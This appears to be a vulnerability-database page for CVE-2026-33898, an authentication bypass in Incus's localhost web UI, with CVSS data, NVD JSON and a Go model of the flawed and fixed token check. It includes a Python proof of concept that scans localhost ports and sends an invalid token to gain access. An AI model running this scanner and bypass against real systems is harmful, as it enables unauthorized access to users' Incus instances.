Security Vulnerability Report
CVE-2026-33898 CVSS 8.8 HIGH

CVE-2026-33898

Published: 2026-03-27 00:16:23
Last Modified: 2026-04-01 16:09:32

Description

Incus is a system container and virtual machine manager. Prior to version 6.23.0, the web server spawned by `incus webui` incorrectly validates the authentication token, so that an invalid value is accepted. `incus webui` runs a local web server on a random localhost port. For authentication, it gives the user a URL containing an authentication token. When that URL is opened, Incus sets a cookie carrying the token so that it need not be included in subsequent HTTP requests. While the Incus client correctly validates the value of the cookie, it does not correctly validate the token when it is passed in the URL. An attacker able to locate and talk to the temporary web server on localhost therefore gets as much access to Incus as the user who ran `incus webui`. Because the port is random, the attacker must first find it, for instance by scanning the localhost port range. This can lead to privilege escalation by another local user, or to access to the user's Incus instances and possibly system resources by a remote attacker able to trick the local user into interacting with the Incus UI web server. Version 6.23.0 patches the issue.
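The check the description contrasts (cookie value validated, URL token accepted regardless of its value) is modelled below as an added illustration written for this page; it is not Incus's own code and does not claim to reproduce the actual Incus handler. It builds a minimal localhost UI handler in Go with the flawed URL-token path beside the corrected one, and a probe that reports the status code each version returns. The cookie name `ui_token` is hypothetical, and the `auth` query parameter and `/1.0/instances` path are assumptions taken from this page's PoC rather than from the Incus source.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// CookieName is a hypothetical cookie name for this illustration; not taken from Incus.
const CookieName = "ui_token"

// AuthMode selects which URL-token check the handler applies.
type AuthMode int

const (
	ModeVulnerable AuthMode = iota // URL token accepted whenever present; value ignored
	ModeFixed                      // URL token compared against the expected value
)

// tokenMatches compares a presented token with the expected one in constant time.
func tokenMatches(presented, expected string) bool {
	return subtle.ConstantTimeCompare([]byte(presented), []byte(expected)) == 1
}

// NewUIServer models the localhost web server the advisory describes.
// A first visit presents the token in the ?auth= query parameter; the server
// then sets a cookie so later requests need not repeat it. The cookie path is
// checked correctly in both modes; only the URL-token path differs.
func NewUIServer(expected string, mode AuthMode) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if c, err := r.Cookie(CookieName); err == nil {
			if !tokenMatches(c.Value, expected) {
				http.Error(w, "invalid session cookie", http.StatusForbidden)
				return
			}
			fmt.Fprintln(w, "ok (cookie)")
			return
		}

		presented := r.URL.Query().Get("auth")
		if presented == "" {
			http.Error(w, "missing token", http.StatusForbidden)
			return
		}
		// The flaw the advisory describes, modelled here: in ModeVulnerable the
		// parameter's presence is taken as proof of possession and its value is
		// never compared with the expected token.
		if mode == ModeFixed && !tokenMatches(presented, expected) {
			http.Error(w, "invalid token", http.StatusForbidden)
			return
		}
		http.SetCookie(w, &http.Cookie{
			Name:     CookieName,
			Value:    presented,
			Path:     "/",
			HttpOnly: true,
			SameSite: http.SameSiteStrictMode,
		})
		fmt.Fprintln(w, "ok (url token)")
	})
}

// Probe sends one GET to the handler and returns the HTTP status code.
// cookie, when non-empty, is sent as the session cookie.
func Probe(h http.Handler, target, cookie string) int {
	req := httptest.NewRequest(http.MethodGet, target, nil)
	if cookie != "" {
		req.AddCookie(&http.Cookie{Name: CookieName, Value: cookie})
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

// NewToken returns a 256-bit random token, hex encoded, standing in for the
// one-time URL token the UI server hands to the user.
func NewToken() (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

func main() {
	token, err := NewToken()
	if err != nil {
		panic(err)
	}
	// Path and parameter name follow the page's PoC; both are assumptions.
	bogus := "/1.0/instances?auth=not-the-real-token"
	servers := []struct {
		name string
		h    http.Handler
	}{{"vulnerable", NewUIServer(token, ModeVulnerable)}, {"fixed", NewUIServer(token, ModeFixed)}}
	for _, s := range servers {
		fmt.Printf("%-10s bogus URL token -> %d\n", s.name, Probe(s.h, bogus, ""))
		fmt.Printf("%-10s real URL token  -> %d\n", s.name, Probe(s.h, "/1.0/instances?auth="+token, ""))
		fmt.Printf("%-10s bogus cookie    -> %d\n", s.name, Probe(s.h, "/1.0/instances", "bogus"))
	}
}
```

The vulnerable handler answers 200 to any request carrying an `auth` parameter, whatever its value, which is all the attacker needs once the random port has been found; the corrected handler rejects the bogus value and only issues a cookie after a successful constant-time comparison. Confirm the actual fix against the vendor advisory before relying on this model for detection or testing.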

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* - VULNERABLE
Incus < 6.23.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

import requests

# Proof of Concept for CVE-2026-33898
# This script scans localhost for the Incus WebUI and attempts to bypass authentication.
# The /1.0/instances path and the "auth" query parameter used below are the PoC's own
# assumptions; verify them against the advisory and the URL printed by `incus webui`.


def find_incus_port(start_port=30000, end_port=40000):
    """Scan localhost for the potential Incus WebUI port."""
    open_ports = []
    for port in range(start_port, end_port):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Per-socket timeout so a closed port does not stall the scan.
            sock.settimeout(0.5)
            result = sock.connect_ex(('127.0.0.1', port))
            if result == 0:
                # Check if it looks like Incus WebUI (heuristic)
                try:
                    response = requests.get(f'http://127.0.0.1:{port}', timeout=1)
                    if 'Incus' in response.text or 'token' in response.text:
                        open_ports.append(port)
                except requests.RequestException:
                    pass
            sock.close()
        except OSError:
            continue
    return open_ports


def exploit_auth_bypass(port):
    """Attempts to access the API using a malformed/invalid token."""
    # The vulnerability accepts invalid tokens in the URL
    target_url = f'http://127.0.0.1:{port}/1.0/instances?auth=invalid_token_bypass'
    try:
        response = requests.get(target_url, timeout=5)
        if response.status_code == 200:
            print(f"[+] Potential Bypass Successful on port {port}!")
            print(f"[+] Response: {response.text[:200]}")
            return True
        print(f"[-] Failed on port {port}. Status: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error connecting to port {port}: {e}")
    return False


if __name__ == "__main__":
    print("[*] Scanning for Incus WebUI...")
    ports = find_incus_port()
    if not ports:
        print("[*] No potential Incus WebUI ports found.")
    else:
        print(f"[*] Found potential ports: {ports}")
        for p in ports:
            exploit_auth_bypass(p)

References

https://github.com/lxc/incus/security/advisories/GHSA-453r-g2pg-cxxq (Vendor Advisory)

Weakness: CWE-287 (Improper Authentication)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33898",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-27T00:16:23.333",
    "lastModified": "2026-04-01T16:09:31.703",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, the web server spawned by `incus webui` incorrectly validates the authentication token such that an invalid value will be accepted. `incus webui` runs a local web server on a random localhost port. For authentication, it provides the user with a URL containing an authentication token. When accessed with that token, Incus creates a cookie persisting that token without needing to include it in subsequent HTTP requests. While the Incus client correctly validates the value of the cookie, it does not correctly validate the token when passed int the URL.\nThis allows for an attacker able to locate and talk to the temporary web server on localhost to have as much access to Incus as the user who ran `incus webui`. This can lead to privilege escalation by another local user or an access to the user's Incus instances and possibly system resources by a remote attack able to trick the local user into interacting with the Incus UI web server. Version 6.23.0 patches the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-287"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "6.23.0",
                "matchCriteriaId": "CBE3ABCB-1D47-4A45-A09A-C9F609C53131"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/lxc/incus/security/advisories/GHSA-453r-g2pg-cxxq",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}